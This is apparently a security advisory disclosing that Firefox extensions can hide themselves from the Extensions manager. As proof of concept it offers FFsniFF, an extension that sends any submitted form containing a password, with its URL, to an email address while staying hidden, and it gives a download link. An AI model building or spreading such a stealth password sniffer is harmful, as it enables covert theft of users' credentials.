|
|
Background
----------
Firefox is very popular and secure web browser=2E Until now, it is used by
millions of people and thousands of internet clubs=2E One of the great features of
Firefox are extensions=2E You can use them to create things inside your browser
which are beyond your imagination=2E
Overview
--------
Every Firefox extensions developer knows the 'hidden' property of 'install
manifest'=2E This property can be used to hide _globally_ installed extensions and
it can't hide only local extension (this is a design feature so the extensions
installed by users can't be hidden)=2E But there is another way to make extension
hidden=2E=2E
Did you know that you can't trust to what Extensions manager is saying ? For
detailed information look at the function 'hide_me()' in file
'src/chrome/content/ffsniff/ffsniffOverlay_orig=2Ejs' of my PoC=2E This bug was in
older versions of Firefox and was 'inherited' also in Firefox 3=2E
Proof of Concept
----------------
As a PoC I updated my Firefox sniffer extension (FFsniFF) so now it's compatible
with Firefox 3 (was released today)=2E You can download it here:
http://azurit=2Eelbiahosting=2Esk/ffsniff/
The new version (0=2E3) was tested with Firefox 2=2E0 and 3=2E0 =2E
FFsniFF is a simple Firefox extension, which transforms your browser into the
html form sniffer=2E Every time the user click on 'Submit' button, FFsniFF will
try to find a non-blank password field in the form=2E If it's found, entire form
(also with URL) is sent to the specified e-mail address=2E It also has the ability
to hide itself from 'Extensions manager'=2E
Solution
--------
There's no solution for this problem at this time=2E
azurIt, azurIt@IRCnet, azurit (at) pobox (dot) sk